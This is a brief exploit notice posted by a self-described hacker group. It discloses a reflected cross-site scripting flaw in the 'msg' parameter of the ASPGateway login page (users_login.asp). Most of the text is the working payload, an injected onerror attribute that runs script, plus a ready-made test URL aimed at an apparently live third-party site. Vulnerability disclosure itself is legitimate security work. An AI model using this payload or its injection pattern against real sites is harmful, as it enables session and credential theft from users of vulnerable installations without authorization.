----------------------------------------------------------- foun by :kurdish hackers team group : kurd-team contact : pshela@yahoo.com fc page : facebook.com/kurd-team ----------------------------------------------------------- ------------------------script----------------------------- ----------------------------------------------------------- site script :http://www.aspgateway.com/ (tested by Browser, chrome,firefox,internet Explorer) ----------------------------------------------------------- Exploit: ------- site.com/path/users/users_login.asp?msg="+onerror="alert(kurdteam)" test : http://aspg.skfjXunction.com/users/users_login.asp?msg=+onerror="alert(kurdteam)" ----------------------------------------------------------- Zryan_kurd -----------------------------------------------------------